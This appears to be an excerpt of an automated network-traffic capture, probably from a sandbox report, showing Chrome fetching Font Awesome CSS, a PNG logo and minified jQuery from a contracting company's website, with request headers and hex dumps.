                                              2024-09-27 06:19:42 UTC1369INData Raw: 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 46 72 65 65 22 7d 2e 66 61 2d 62 72 61 6e 64 73 2c 2e 66 61 62 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 42 72 61 6e 64 73 22 7d 2e 66 61 2d 31 78
                                              Data Ascii: aliased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x
                                              2024-09-27 06:19:42 UTC1369INData Raw: 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29
                                              Data Ascii: t:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);animation-delay:var(--fa-animation-delay,0s)
                                              2024-09-27 06:19:42 UTC1369INData Raw: 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75
                                              Data Ascii: nimation-timing,cubic-bezier(.28,.84,.42,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-cou
                                              2024-09-27 06:19:42 UTC1369INData Raw: 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                                              Data Ascii: -delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-
                                              2024-09-27 06:19:42 UTC1369INData Raw: 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e
                                              Data Ascii: );animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation
                                              2024-09-27 06:19:42 UTC1369INData Raw: 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35
                                              Data Ascii: orm:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25
                                              2024-09-27 06:19:42 UTC1369INData Raw: 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d
                                              Data Ascii: cale(1) translateY(0)}}@keyframes fa-bounce{0%{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--
                                              2024-09-27 06:19:42 UTC1369INData Raw: 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c
                                              Data Ascii: bkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scal
                                              2024-09-27 06:19:42 UTC1369INData Raw: 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 68 61 6b 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d
                                              Data Ascii: it-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes fa-shake{0%{-webkit-transform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.465320173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:43 UTC682OUTGET /images/logo1.png HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:43 UTC260INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:43 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:22:40 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 19094
                                              Connection: close
                                              Content-Type: image/png
                                              2024-09-27 06:19:43 UTC7932INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fd 00 00 00 57 08 06 00 00 00 cf b2 43 74 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                              Data Ascii: PNGIHDRWCtpHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
                                              2024-09-27 06:19:43 UTC8000INData Raw: 34 ba 8f 65 59 df 71 2d 16 8b 27 25 93 c9 0b 56 59 ec 91 b5 da 54 a9 54 06 e3 f1 f8 3b 1a 94 50 88 10 92 f2 69 bf 39 3b 3b fb 48 03 fb 1b 73 1c c7 6f be 90 50 28 54 0a 85 42 25 45 51 d6 9c 13 84 90 57 39 8e b3 65 c7 8e 1d b0 7b f7 ee f5 f9 f4 c8 34 4b 56 24 fc 48 e0 b4 17 01 9b cd bc 74 2d 7f 36 1c 0e e7 30 c6 8b b0 9c 9d d5 24 84 a8 18 63 09 00 24 58 a3 04 32 a5 54 62 18 e6 5e 4d d3 b2 7e e7 c6 bd e2 07 8f 73 1c f7 68 a1 50 38 20 20 e2 38 0e c4 62 31 8b e3 38 29 97 cb bd be 55 5d 38 86 61 48 20 10 50 2d cb 7a ab 61 18 2d fb 14 89 44 d2 9e 6f 24 00 80 41 08 a9 61 8c 15 68 28 c3 ec 05 71 58 00 78 e8 50 40 6f 18 c6 16 3f ca 27 08 c2 ef 8b c5 e2 39 c3 c3 c3 98 10 32 8c 10 7a 5b 3e 9f bf aa 5a ad 4a 3e cf 92 79 9e 7f 33 00 7c 05 00 40 d7 f5 6d ad 8a 5d e4 f3
                                              Data Ascii: 4eYq-'%VYTT;Pi9;;HsoP(TB%EQW9e{4KV$Ht-60$c$X2Tb^M~shP8 8b18)U]8aH P-za-Do$Aah(qXxP@o?'92z[>ZJ>y3|@m]
                                              2024-09-27 06:19:43 UTC3162INData Raw: 7b 41 c8 3f ac 62 63 e7 10 42 20 1c 0e e7 38 8e 7f 22 97 cb be dc b2 2c 5c 2a 95 7e b1 92 8f 8f 61 98 a9 d9 d9 d9 ea f0 f0 f0 fb 72 d9 2c 1f 08 04 6c 5d d7 7f d8 e0 c6 29 f5 7a fd 96 74 3a fd 62 2f 91 a7 4b 08 c1 c1 60 70 21 16 8b 9d d5 c8 7e 36 6f de 8c 2b 95 ca 4b 10 42 14 63 fc a3 d5 fd e8 ef ef 57 0a 85 42 52 96 e5 45 51 0c 4c 37 e6 50 5c 5a 5a 14 6d db 3e 5f 92 24 93 61 98 ef 19 a6 09 2c cb 42 34 1c 86 b9 d9 79 d0 75 03 78 9e 6f 6f ce 79 ae c4 b6 ed 93 5c d7 45 a2 28 d6 4d c3 5c 77 36 de 95 1a 67 2c cb 4e b5 ba 4e d7 f5 6b 34 4d e3 43 a1 90 e6 ba ee 8f 3d 0a 8d 01 e0 3c 6f b7 96 39 bf b0 f0 ba 54 2a f5 25 ef b9 b8 5a ad 86 28 a5 a0 28 ca 64 2c 16 3d a8 10 86 a1 eb 7d ba 6e 78 2b 05 f8 fe e6 bf 6b 9c ed 05 cf f2 89 44 e2 89 a5 a5 a5 ef d6 eb 75 31 1e
                                              Data Ascii: {A?bcB 8",\*~ar,l])zt:b/K`p!~6o+KBcWBREQL7P\ZZm>_$a,B4yuxooy\E(M\w6g,NNk4MC=<o9T*%Z((d,=}nx+kDu1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.465321173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:43 UTC622OUTGET /js/jquery.min.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:43 UTC273INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:43 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 89475
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:43 UTC7919INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                              Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                              2024-09-27 06:19:43 UTC8000INData Raw: 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 74 7c 7c 65 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 74 26 26 61 65 28 65 29 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 22 6c 61 62 65 6c 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64
                                              Data Ascii: &e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(e)===t:e.disabled===t:"label"in e&&e.disabled
                                              2024-09-27 06:19:43 UTC8000INData Raw: 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c
                                              Data Ascii: rentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]|
                                              2024-09-27 06:19:43 UTC8000INData Raw: 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 76 6f 69 64 20 30 21 3d 3d 6e 3b 77 68 69 6c 65 28 28 65 3d 65 5b 74 5d 29 26 26 39 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 69 66 28 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 7b 69 66 28 69 26 26 53 28 65 29 2e 69
                                              Data Ascii: rs,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&S(e).i
                                              2024-09-27 06:19:43 UTC8000INData Raw: 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c 46 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53 5d 29 7d 7d 29 2c 53 2e 72 65 61 64 79 2e 74 68 65 6e 3d 46 2e 74 68 65 6e 2c 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22
                                              Data Ascii: (e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||F.resolveWith(E,[S])}}),S.ready.then=F.then,"complete"===E.readyState||"loading"
